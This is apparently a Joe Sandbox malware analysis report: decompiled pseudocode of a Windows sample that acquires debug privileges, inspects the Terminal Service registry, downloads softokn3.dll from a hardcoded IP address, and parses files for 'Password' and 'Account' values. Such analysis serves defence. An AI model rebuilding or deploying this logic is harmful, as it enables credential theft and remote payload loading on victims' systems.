                                      							_t80 = E0040BAFB(_t202, _t199, _t159);
                                      							__eflags = _t80;
                                      							if(_t80 != 0) {
                                      								E0040BD7B(_t160);
                                      								_t82 = E004033AB( &_v52, L"SeDebugPrivilege");
                                      								_t83 = GetCurrentProcess();
                                      								_t200 = _t82;
                                      								_t84 = E0040D3CA(_t83, _t82);
                                      								E004058FB(_v56);
                                      								__eflags = _t84;
                                      								if(_t84 != 0) {
                                      									_t164 =  *(_t202 + 0x2c);
                                      									_t86 = E0040E7E1( *(_t202 + 0x2c));
                                      									__eflags = _t86;
                                      									if(_t86 != 0) {
                                      										Sleep(0x3e8);
                                      										_t87 =  *(_t202 + 0x48);
                                      										__eflags = _t87;
                                      										if(_t87 != 0) {
                                      											_t211 = _t154;
                                      											__eflags = _t211 - _t87;
                                      											do {
                                      												E004056F9(_t164 & 0xffffff00 | __eflags > 0x00000000);
                                      												E004033F3( &_v52,  *((intOrPtr*)(_t202 + 0x40)) + _t211 * 4);
                                      												E0040B64D( &_v56);
                                      												_t164 = _v60;
                                      												E004058FB(_v60);
                                      												_t211 = _t211 + 1;
                                      												_v60 = _t154;
                                      												__eflags = _t211 -  *(_t202 + 0x48);
                                      											} while (_t211 <  *(_t202 + 0x48));
                                      										}
                                      										Sleep(0x1f4);
                                      										E004033F3( &_v52, _t202 + 0x28);
                                      										E0040B64D( &_v56);
                                      										_t166 = _v60;
                                      										E004058FB(_v60);
                                      										Sleep(0x1f4);
                                      										_t93 = E0040B780(_t200, __eflags, _v60);
                                      										__eflags = _t93;
                                      										if(_t93 != 0) {
                                      											_t94 = E0040D780(_t166);
                                      											__eflags = _t94 - 1;
                                      											if(_t94 == 1) {
                                      												E0040D375(_v56);
                                      											}
                                      											E00404A3D( *((intOrPtr*)(_t202 + 0x60)), E004046DA( &_v52, _t154, _t202 + 0x58, _t202 + 0x5c));
                                      											E004046B7( &_v68);
                                      											LeaveCriticalSection(_t202);
                                      											_t154 = 8;
                                      										} else {
                                      											_push(_t202 + 0x5c);
                                      											_push(_t202 + 0x58);
                                      											_push(7);
                                      											goto L31;
                                      										}
                                      									} else {
                                      										E0040D375(_v56);
                                      										_push(_t202 + 0x5c);
                                      										_push(_t202 + 0x58);
                                      										_push(5);
                                      										goto L31;
                                      									}
                                      								} else {
                                      									E0040D375(_v56);
                                      									_push(_t202 + 0x5c);
                                      									_push(_t202 + 0x58);
                                      									_push(3);
                                      									goto L31;
                                      								}
                                      							} else {
                                      								E0040D375(_v56);
                                      								_push(_t202 + 0x5c);
                                      								_push(_t202 + 0x58);
                                      								_push(6);
                                      								goto L31;
                                      							}
                                      						} else {
                                      							E0040D375(_v56);
                                      							_push(_t202 + 0x5c);
                                      							_push(_t202 + 0x58);
                                      							_push(4);
                                      							L31:
                                      							E00404A3D( *((intOrPtr*)(_t202 + 0x60)), E004046DA( &_v52));
                                      							E004046B7( &_v68);
                                      							LeaveCriticalSection(_t202);
                                      						}
                                      					} else {
                                      						E004033F3(_t215, _t206);
                                      						E0040DD2B( &_v32, __eflags, _t156, _t154);
                                      						_t183 =  *((intOrPtr*)(_t202 + 0x54));
                                      						E00410CE2( *((intOrPtr*)(_t202 + 0x54)), _t199,  &_v64,  *((intOrPtr*)(_t202 + 0x60)), 3);
                                      						__eflags = _v76 - _t154;
                                      						if(_v76 != _t154) {
                                      							_t184 =  &_v28;
                                      							_t132 = E0040D918(_t184, _t183, _t183);
                                      							__eflags = _t132;
                                      							if(_t132 != 0) {
                                      								_push(_t184);
                                      								E0040DC65( &_v28,  &_v52);
                                      								E0040DC4D( &_v36);
                                      							}
                                      							E00402DFF( &_v52);
                                      							E0040DA15( &_v28, __eflags);
                                      							goto L17;
                                      						} else {
                                      							E00402DFF( &_v52);
                                      							goto L7;
                                      						}
                                      					}
                                      				} else {
                                      					E004033F3(_t215, _t205);
                                      					E0040DD2B( &_v32, _t217, _t156, _t154);
                                      					_t142 = E0040D780( &_v32);
                                      					_t193 =  *((intOrPtr*)(_t202 + 0x54));
                                      					_t143 =  &_v64;
                                      					if(_t142 != 1) {
                                      						_push(1);
                                      					} else {
                                      						_push(2);
                                      					}
                                      					_push( *((intOrPtr*)(_t202 + 0x60)));
                                      					_push(_t143);
                                      					E00402C65( &_v48, E00410CE2(_t193, _t199));
                                      					_t195 =  &_v68;
                                      					E00402DFF( &_v68);
                                      					_t219 = _v52 - _t154;
                                      					if(_v52 != _t154) {
                                      						_t196 =  &_v28;
                                      						__eflags = E0040D918(_t196,  &_v68, _t195);
                                      						if(__eflags != 0) {
                                      							_push(_t196);
                                      							E0040DC65( &_v28,  &_v36);
                                      							E0040DC4D( &_v36);
                                      						}
                                      						_t156 =  &_v28;
                                      						E0040DA15( &_v28, __eflags);
                                      						goto L11;
                                      					} else {
                                      						L7:
                                      						E0040DA15( &_v28, _t219);
                                      						_t154 = _t154 | 0xffffffff;
                                      					}
                                      				}
                                      				E00402DFF( &_v36);
                                      				return _t154;
                                      			}




































                                      0x0040c017
                                      0x0040c017
                                      0x0040c01d
                                      0x0040c023
                                      0x0040c025
                                      0x0040c028
                                      0x0040c02c
                                      0x0040c030
                                      0x0040c034
                                      0x0040c042
                                      0x0040c044
                                      0x0040c048
                                      0x0040c048
                                      0x0040c04d
                                      0x0040c052
                                      0x0040c058
                                      0x0040c05a
                                      0x0040c0ed
                                      0x0040c0ed
                                      0x0040c0f2
                                      0x0040c0f8
                                      0x0040c0fa
                                      0x0040c16e
                                      0x0040c170
                                      0x0040c177
                                      0x0040c17c
                                      0x0040c17e
                                      0x0040c183
                                      0x0040c185
                                      0x0040c1a0
                                      0x0040c1a2
                                      0x0040c1a7
                                      0x0040c1a9
                                      0x0040c1c3
                                      0x0040c1d1
                                      0x0040c1d8
                                      0x0040c1de
                                      0x0040c1e2
                                      0x0040c1ed
                                      0x0040c1f2
                                      0x0040c1f4
                                      0x0040c20e
                                      0x0040c211
                                      0x0040c216
                                      0x0040c218
                                      0x0040c23d
                                      0x0040c23f
                                      0x0040c242
                                      0x0040c244
                                      0x0040c246
                                      0x0040c248
                                      0x0040c24a
                                      0x0040c24d
                                      0x0040c25d
                                      0x0040c267
                                      0x0040c26c
                                      0x0040c270
                                      0x0040c278
                                      0x0040c279
                                      0x0040c27d
                                      0x0040c27d
                                      0x0040c281
                                      0x0040c28c
                                      0x0040c296
                                      0x0040c2a0
                                      0x0040c2a5
                                      0x0040c2a9
                                      0x0040c2b3
                                      0x0040c2b6
                                      0x0040c2bb
                                      0x0040c2bd
                                      0x0040c2ed
                                      0x0040c2f2
                                      0x0040c2f5
                                      0x0040c2fb
                                      0x0040c2fb
                                      0x0040c316
                                      0x0040c31f
                                      0x0040c325
                                      0x0040c32d
                                      0x0040c2bf
                                      0x0040c2c2
                                      0x0040c2c6
                                      0x0040c2c7
                                      0x00000000
                                      0x0040c2c7
                                      0x0040c21a
                                      0x0040c21e
                                      0x0040c226
                                      0x0040c22a
                                      0x0040c22b
                                      0x00000000
                                      0x0040c22b
                                      0x0040c1f6
                                      0x0040c1fa
                                      0x0040c202
                                      0x0040c206
                                      0x0040c207
                                      0x00000000
                                      0x0040c207
                                      0x0040c1ab
                                      0x0040c1af
                                      0x0040c1b7
                                      0x0040c1bb
                                      0x0040c1bc
                                      0x00000000
                                      0x0040c1bc
                                      0x0040c187
                                      0x0040c18b
                                      0x0040c193
                                      0x0040c197
                                      0x0040c198
                                      0x0040c2c9
                                      0x0040c2d6
                                      0x0040c2df
                                      0x0040c2e5
                                      0x0040c2e5
                                      0x0040c0fc
                                      0x0040c101
                                      0x0040c10a
                                      0x0040c10f
                                      0x0040c11c
                                      0x0040c121
                                      0x0040c125
                                      0x0040c137
                                      0x0040c13b
                                      0x0040c140
                                      0x0040c142
                                      0x0040c144
                                      0x0040c14e
                                      0x0040c157
                                      0x0040c157
                                      0x0040c160
                                      0x0040c169
                                      0x00000000
                                      0x0040c127
                                      0x0040c12b
                                      0x00000000
                                      0x0040c12b
                                      0x0040c125
                                      0x0040c060
                                      0x0040c065
                                      0x0040c06e
                                      0x0040c073
                                      0x0040c078
                                      0x0040c07e
                                      0x0040c082
                                      0x0040c088
                                      0x0040c084
                                      0x0040c084
                                      0x0040c084
                                      0x0040c08a
                                      0x0040c08d
                                      0x0040c098
                                      0x0040c09d
                                      0x0040c0a1
                                      0x0040c0a6
                                      0x0040c0aa
                                      0x0040c0bf
                                      0x0040c0c8
                                      0x0040c0ca
                                      0x0040c0cc
                                      0x0040c0d6
                                      0x0040c0df
                                      0x0040c0df
                                      0x0040c0e4
                                      0x0040c0e8
                                      0x00000000
                                      0x0040c0ac
                                      0x0040c0ac
                                      0x0040c0b0
                                      0x0040c0b5
                                      0x0040c0b5
                                      0x0040c0aa
                                      0x0040c332
                                      0x0040c33f

                                      APIs
                                      • EnterCriticalSection.KERNEL32 ref: 0040C034
                                        • Part of subcall function 0040D780: GetCurrentProcess.KERNEL32(?,?,00402B66,?,00412428,?,?), ref: 0040D784
                                      • PathFileExistsW.SHLWAPI(?), ref: 0040C0F2
                                      • PathFileExistsW.SHLWAPI(?), ref: 0040C052
                                        • Part of subcall function 0040D918: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 0040D92F
                                        • Part of subcall function 0040D918: GetLastError.KERNEL32(?,?,?,00408590,?,?,?), ref: 0040D93D
                                      • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040C2E5
                                        • Part of subcall function 0040BAFB: RegOpenKeyExW.ADVAPI32 ref: 0040BB2F
                                      • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0040C1D8
                                      • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040C325
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 1717069549-2896544425
                                      • Opcode ID: 9d95510fd3a69620aa4185021c429ef206859b341bb8ce3e58d3dd84583424a9
                                      • Instruction ID: 5877a61cdd06f7866b0ac8815eceb181e086673125db960341a94c968825164e
                                      • Opcode Fuzzy Hash: 9d95510fd3a69620aa4185021c429ef206859b341bb8ce3e58d3dd84583424a9
                                      • Instruction Fuzzy Hash: 49913171514605EBC714FBA2C8919AF73A8BF84308F404A3FF552A35D1DB78E909CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040BDF7(void* __ecx, void* __edx) {
                                      				void* _v8;
                                      				WCHAR* _v12;
                                      				signed int _v16;
                                      				short* _v20;
                                      				short* _v24;
                                      				char _v28;
                                      				int _v32;
                                      				char _v36;
                                      				void* _t50;
                                      				void* _t62;
                                      				void* _t72;
                                      				void* _t96;
                                      
                                      				_t96 = __edx;
                                      				_t72 = __ecx;
                                      				_v8 = 0;
                                      				E004033AB( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
                                      				E004033AB( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                      				_v36 = 0;
                                      				_v32 = 0;
                                      				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
                                      					_t50 = E0040EAAE( &_v8, _t96, E004033AB( &_v16, L"ImagePath"),  &_v36);
                                      					E004058FB(_v16);
                                      					E0040EA99( &_v8);
                                      					_t103 = _t50;
                                      					if(_t50 != 0) {
                                      						E00402CA1( &_v36, _t103,  &_v12);
                                      						E00402D8C( &_v36);
                                      						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
                                      							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
                                      								_t62 = E0040EAAE( &_v8, _t96, E004033AB( &_v16, L"ServiceDll"),  &_v36);
                                      								E004058FB(_v16);
                                      								_t107 = _t62;
                                      								if(_t62 != 0) {
                                      									E004031FD(_t72 + 0x20, E00402F9A( &_v16, E00402CA1( &_v36, _t107,  &_v28), _t107));
                                      									E004058FB(_v16);
                                      									_v16 = _v16 & 0x00000000;
                                      									E004058FB(_v28);
                                      								}
                                      								E0040EA99( &_v8);
                                      							}
                                      						}
                                      						E004058FB(_v12);
                                      						_v12 = _v12 & 0x00000000;
                                      					}
                                      				}
                                      				E00402DFF( &_v36);
                                      				E004058FB(_v20);
                                      				E004058FB(_v24);
                                      				return E0040EA99( &_v8);
                                      			}















                                      0x0040bdf7
                                      0x0040bdff
                                      0x0040be0b
                                      0x0040be0e
                                      0x0040be1b
                                      0x0040be23
                                      0x0040be30
                                      0x0040be40
                                      0x0040be5b
                                      0x0040be65
                                      0x0040be6d
                                      0x0040be72
                                      0x0040be74
                                      0x0040be81
                                      0x0040be89
                                      0x0040bea0
                                      0x0040becf
                                      0x0040bee6
                                      0x0040bef0
                                      0x0040bef5
                                      0x0040bef7
                                      0x0040bf13
                                      0x0040bf1b
                                      0x0040bf23
                                      0x0040bf27
                                      0x0040bf27
                                      0x0040bf2f
                                      0x0040bf2f
                                      0x0040becf
                                      0x0040bf37
                                      0x0040bf3c
                                      0x0040bf3c
                                      0x0040be74
                                      0x0040bf43
                                      0x0040bf4b
                                      0x0040bf53
                                      0x0040bf63

                                      APIs
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                      • RegOpenKeyExW.ADVAPI32 ref: 0040BE38
                                        • Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAD1
                                        • Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAF4
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                        • Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3
                                      • StrStrW.SHLWAPI(?,svchost.exe), ref: 0040BE9C
                                      • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0040BEAA
                                      • RegOpenKeyExW.ADVAPI32 ref: 0040BEC7
                                      Strings
                                      • ServiceDll, xrefs: 0040BED5
                                      • ImagePath, xrefs: 0040BE4A
                                      • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0040BE03
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040BE13
                                      • svchost.exe, xrefs: 0040BE94
                                      • svchost.exe -k, xrefs: 0040BEA2
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                      • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                      • API String ID: 2246401353-3333427388
                                      • Opcode ID: de1d24e80b811010541691654104bd08d4f21dff33e2f7b71c4b14df932f3dd7
                                      • Instruction ID: 64bba380daa3bfec47375a8439a74281b059c2058821268f4613e4dc92f8855d
                                      • Opcode Fuzzy Hash: de1d24e80b811010541691654104bd08d4f21dff33e2f7b71c4b14df932f3dd7
                                      • Instruction Fuzzy Hash: 0E412C71D10219ABCB14EBA2CD92AEEBB78EF08705F10407EA911B21D1DF785F14DB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040F445(WCHAR* __ecx, intOrPtr* __edx) {
                                      				long _v8;
                                      				long _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				void* _v24;
                                      				intOrPtr* _v28;
                                      				void* _t24;
                                      				intOrPtr _t29;
                                      				long _t46;
                                      				void* _t51;
                                      				void* _t55;
                                      
                                      				_t46 = 0;
                                      				_v28 = __edx;
                                      				_t24 = InternetOpenW(L"Mozilla/32.0 (compatible)", 0, 0, 0, 0);
                                      				_v24 = _t24;
                                      				if(_t24 == 0) {
                                      					L7:
                                      					return 0;
                                      				}
                                      				_t51 = InternetOpenUrlW(_t24, __ecx, 0, 0, 0x400000, 0);
                                      				if(_t51 == 0) {
                                      					goto L7;
                                      				}
                                      				_v8 = 0;
                                      				InternetQueryDataAvailable(_t51,  &_v8, 0, 0);
                                      				_v12 = _v12 | 0xffffffff;
                                      				_t29 = E0040590A(0x400000);
                                      				_v20 = _t29;
                                      				if(_t29 == 0) {
                                      					goto L7;
                                      				}
                                      				_v16 = 0;
                                      				do {
                                      					_t53 = E004010AD(_v8);
                                      					InternetReadFile(_t51, _t31, _v8,  &_v12);
                                      					_v16 = _v16 + _v8;
                                      					InternetQueryDataAvailable(_t51,  &_v8, 0, 0);
                                      					E0040102C(_v20 + _t46, _t31, _v12);
                                      					_t46 = _t46 + _v12;
                                      					E004010C1(_t53);
                                      					_t55 = _t55 + 0x10;
                                      				} while (_v12 != 0);
                                      				InternetCloseHandle(_v24);
                                      				InternetCloseHandle(_t51);
                                      				if(_t46 != _v16) {
                                      					goto L7;
                                      				}
                                      				 *_v28 = _t46;
                                      				return _v20;
                                      			}














                                      0x0040f44e
                                      0x0040f450
                                      0x0040f45e
                                      0x0040f464
                                      0x0040f469
                                      0x0040f523
                                      0x00000000
                                      0x0040f523
                                      0x0040f47f
                                      0x0040f483
                                      0x00000000
                                      0x00000000
                                      0x0040f48e
                                      0x0040f493
                                      0x0040f499
                                      0x0040f4a2
                                      0x0040f4a7
                                      0x0040f4ac
                                      0x00000000
                                      0x00000000
                                      0x0040f4b0
                                      0x0040f4b3
                                      0x0040f4bc
                                      0x0040f4c7
                                      0x0040f4d5
                                      0x0040f4df
                                      0x0040f4ef
                                      0x0040f4f4
                                      0x0040f4f8
                                      0x0040f4fd
                                      0x0040f500
                                      0x0040f50f
                                      0x0040f512
                                      0x0040f517
                                      0x00000000
                                      0x00000000
                                      0x0040f51c
                                      0x00000000

                                      APIs
                                      • InternetOpenW.WININET(Mozilla/32.0 (compatible),00000000,00000000,00000000,00000000), ref: 0040F45E
                                      • InternetOpenUrlW.WININET(00000000,http://5.206.225.104/dll/softokn3.dll,00000000,00000000,00400000,00000000), ref: 0040F479
                                      • InternetQueryDataAvailable.WININET(00000000,0040A612,00000000,00000000), ref: 0040F493
                                        • Part of subcall function 0040590A: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403418,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00405914
                                        • Part of subcall function 004010AD: GetProcessHeap.KERNEL32(00000000,00000000,0040F16C,00000800,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 004010B3
                                        • Part of subcall function 004010AD: RtlAllocateHeap.NTDLL(00000000,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 004010BA
                                      • InternetReadFile.WININET(00000000,00000000,0040A612,000000FF), ref: 0040F4C7
                                      • InternetQueryDataAvailable.WININET(00000000,0040A612,00000000,00000000), ref: 0040F4DF
                                        • Part of subcall function 004010C1: GetProcessHeap.KERNEL32(00000000,00000000,004032DA,00000000,00000000,?,?,?,00000000), ref: 004010C7
                                        • Part of subcall function 004010C1: HeapFree.KERNEL32(00000000,?,?), ref: 004010CE
                                      • InternetCloseHandle.WININET(?), ref: 0040F50F
                                      • InternetCloseHandle.WININET(00000000), ref: 0040F512
                                      Strings
                                      • http://5.206.225.104/dll/softokn3.dll, xrefs: 0040F477
                                      • Mozilla/32.0 (compatible), xrefs: 0040F457
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$Heap$AvailableCloseDataHandleOpenProcessQuery$AllocAllocateFileFreeReadVirtual
                                      • String ID: Mozilla/32.0 (compatible)$http://5.206.225.104/dll/softokn3.dll
                                      • API String ID: 2004831061-3309120073
                                      • Opcode ID: fd5ac9df68bc0625120179cc32dd15bd6d2af95af2f17a3ee6a15d7d619fd10e
                                      • Instruction ID: 0bee95642922ad016ee5d3fa3ca101ef3702029e2abbe1c262094c5c5630f16c
                                      • Opcode Fuzzy Hash: fd5ac9df68bc0625120179cc32dd15bd6d2af95af2f17a3ee6a15d7d619fd10e
                                      • Instruction Fuzzy Hash: 23212AB5D00209BFDB119FA5DD85ABFBBBCEB45354F1041B6F400F2291D6789E508BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E00408606(intOrPtr __ecx, CHAR* _a4) {
                                      				char _v12;
                                      				long _v16;
                                      				void* _v20;
                                      				long _v24;
                                      				intOrPtr _v28;
                                      				void* _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				char _v48;
                                      				char _v52;
                                      				char _t96;
                                      				void* _t101;
                                      				char _t103;
                                      				void* _t124;
                                      				intOrPtr _t126;
                                      				char _t127;
                                      				long _t132;
                                      				void* _t134;
                                      				void* _t141;
                                      				void* _t145;
                                      				void* _t146;
                                      				intOrPtr* _t163;
                                      				intOrPtr* _t165;
                                      				void* _t166;
                                      				void* _t167;
                                      				void* _t168;
                                      				void* _t170;
                                      				intOrPtr _t171;
                                      				intOrPtr* _t172;
                                      				void* _t173;
                                      				intOrPtr _t174;
                                      				intOrPtr* _t176;
                                      				CHAR* _t177;
                                      				void* _t178;
                                      				void* _t179;
                                      
                                      				_v36 = __ecx;
                                      				_t173 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
                                      				if(_t173 != 0xffffffff) {
                                      					_t132 = GetFileSize(_t173, 0);
                                      					_v16 = _t132;
                                      					_t170 = E004059A9(_t132);
                                      					_v32 = _t170;
                                      					E00401052(_t170, 0, _t132);
                                      					_v24 = _v24 & 0x00000000;
                                      					_t179 = _t178 + 0xc;
                                      					ReadFile(_t173, _t170, _t132,  &_v24, 0);
                                      					CloseHandle(_t173);
                                      					_t174 = E0040590A(0x400000);
                                      					_v28 = _t174;
                                      					_a4 = E0040590A(0x104);
                                      					_t96 = E0040590A(0x104);
                                      					_t141 = 0;
                                      					_v12 = _t96;
                                      					_t134 = 0;
                                      					__eflags = _v16;
                                      					if(_v16 <= 0) {
                                      						L36:
                                      						E004058FB(_a4);
                                      						E004058FB(_v12);
                                      						return E004058FB(_t174);
                                      					} else {
                                      						goto L3;
                                      					}
                                      					do {
                                      						L3:
                                      						_t165 =  *((intOrPtr*)(_t134 + _t170));
                                      						_t13 = _t165 - 0x21; // -33
                                      						__eflags = _t13 - 0x5d;
                                      						if(_t13 > 0x5d) {
                                      							goto L28;
                                      						}
                                      						__eflags = _t165 - 0x3d;
                                      						if(_t165 == 0x3d) {
                                      							goto L28;
                                      						}
                                      						 *((char*)(_t141 + _t174)) = _t165;
                                      						_t141 = _t141 + 1;
                                      						__eflags = _t165;
                                      						if(_t165 != 0) {
                                      							__eflags =  *((char*)(_t141 + _t174 - 8)) - 0x50;
                                      							if( *((char*)(_t141 + _t174 - 8)) != 0x50) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x61;
                                      							if( *((char*)(_t141 + _t174 - 7)) != 0x61) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x73;
                                      							if( *((char*)(_t141 + _t174 - 6)) != 0x73) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x73;
                                      							if( *((char*)(_t141 + _t174 - 5)) != 0x73) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x77;
                                      							if( *((char*)(_t141 + _t174 - 4)) != 0x77) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x6f;
                                      							if( *((char*)(_t141 + _t174 - 3)) != 0x6f) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x72;
                                      							if( *((char*)(_t141 + _t174 - 2)) != 0x72) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x64;
                                      							if( *((char*)(_t141 + _t174 - 1)) == 0x64) {
                                      								__eflags =  *_t170 - 0xd0;
                                      								_t101 = 2;
                                      								_t145 = 9;
                                      								_t102 =  !=  ? _t145 : _t101;
                                      								_t146 = ( !=  ? _t145 : _t101) + _t134;
                                      								_t103 =  *((intOrPtr*)(_t146 + _t170));
                                      								_t166 = 0;
                                      								__eflags = _t103 - 0x20;
                                      								if(_t103 <= 0x20) {
                                      									L35:
                                      									_t60 =  &_v12; // 0x50
                                      									_v52 = 0;
                                      									_v48 = 0;
                                      									 *((char*)(_t166 +  *_t60)) = 0;
                                      									_v44 = 0;
                                      									E00403185( &_v20,  *_t60);
                                      									_t66 =  &_a4; // 0x50
                                      									E00403185( &_v16,  *_t66);
                                      									E004031FD( &_v44, E00402E63( &_v20, __eflags,  &_v32));
                                      									E004058FB(_v32);
                                      									E004031FD( &_v48, E00402E63( &_v16, __eflags,  &_v32));
                                      									E004058FB(_v32);
                                      									_v40 = 5;
                                      									E004031FD( &_v52, E004033AB( &_v32, 0x412428));
                                      									E004058FB(_v32);
                                      									E00401ED8(_t179 - 0x10,  &_v52);
                                      									E00401F0E(_v36);
                                      									E004058FB(_v16);
                                      									E004058FB(_v20);
                                      									E0040138F( &_v52);
                                      									goto L36;
                                      								}
                                      								_t163 = _t146 + _t170;
                                      								__eflags = _t163;
                                      								_t58 =  &_v12; // 0x50
                                      								_t171 =  *_t58;
                                      								while(1) {
                                      									__eflags = _t103 - 0x7f;
                                      									if(_t103 >= 0x7f) {
                                      										goto L35;
                                      									}
                                      									__eflags = _t103 - 0x21;
                                      									if(_t103 == 0x21) {
                                      										goto L35;
                                      									}
                                      									 *((char*)(_t166 + _t171)) = _t103;
                                      									_t166 = _t166 + 1;
                                      									_t163 = _t163 + 1;
                                      									_t103 =  *_t163;
                                      									__eflags = _t103 - 0x20;
                                      									if(_t103 > 0x20) {
                                      										continue;
                                      									}
                                      									goto L35;
                                      								}
                                      								goto L35;
                                      							}
                                      							goto L28;
                                      						}
                                      						__eflags = _t141 - 7;
                                      						if(_t141 <= 7) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x41;
                                      						if( *((char*)(_t141 + _t174 - 7)) != 0x41) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x63;
                                      						if( *((char*)(_t141 + _t174 - 6)) != 0x63) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x63;
                                      						if( *((char*)(_t141 + _t174 - 5)) != 0x63) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x6f;
                                      						if( *((char*)(_t141 + _t174 - 4)) != 0x6f) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x75;
                                      						if( *((char*)(_t141 + _t174 - 3)) != 0x75) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x6e;
                                      						if( *((char*)(_t141 + _t174 - 2)) != 0x6e) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x74;
                                      						if( *((char*)(_t141 + _t174 - 1)) != 0x74) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *_t170 - 0xd0;
                                      						_t124 = 2;
                                      						_t167 = 9;
                                      						_t125 =  !=  ? _t167 : _t124;
                                      						_t168 = 0;
                                      						_t126 = ( !=  ? _t167 : _t124) + _t134;
                                      						_v20 = _t126;
                                      						_t127 =  *((intOrPtr*)(_t126 + _t170));
                                      						__eflags = _t127 - 0x20;
                                      						if(_t127 <= 0x20) {
                                      							L19:
                                      							 *((char*)(_t168 + _a4)) = 0;
                                      							goto L28;
                                      						}
                                      						_t176 = _v20 + _t170;
                                      						__eflags = _t176;
                                      						_v20 = _t176;
                                      						_t172 = _t176;
                                      						_t177 = _a4;
                                      						while(1) {
                                      							__eflags = _t127 - 0x7f;
                                      							if(_t127 >= 0x7f) {
                                      								break;
                                      							}
                                      							_t172 = _t172 + 1;
                                      							 *((char*)(_t168 + _t177)) = _t127;
                                      							_t168 = _t168 + 1;
                                      							_t127 =  *_t172;
                                      							__eflags = _t127 - 0x20;
                                      							if(_t127 > 0x20) {
                                      								continue;
                                      							}
                                      							break;
                                      						}
                                      						_t174 = _v28;
                                      						_t170 = _v32;
                                      						goto L19;
                                      						L28:
                                      						_t134 = _t134 + 1;
                                      						__eflags = _t134 - _v16;
                                      					} while (_t134 < _v16);
                                      					goto L36;
                                      				}
                                      				GetLastError();
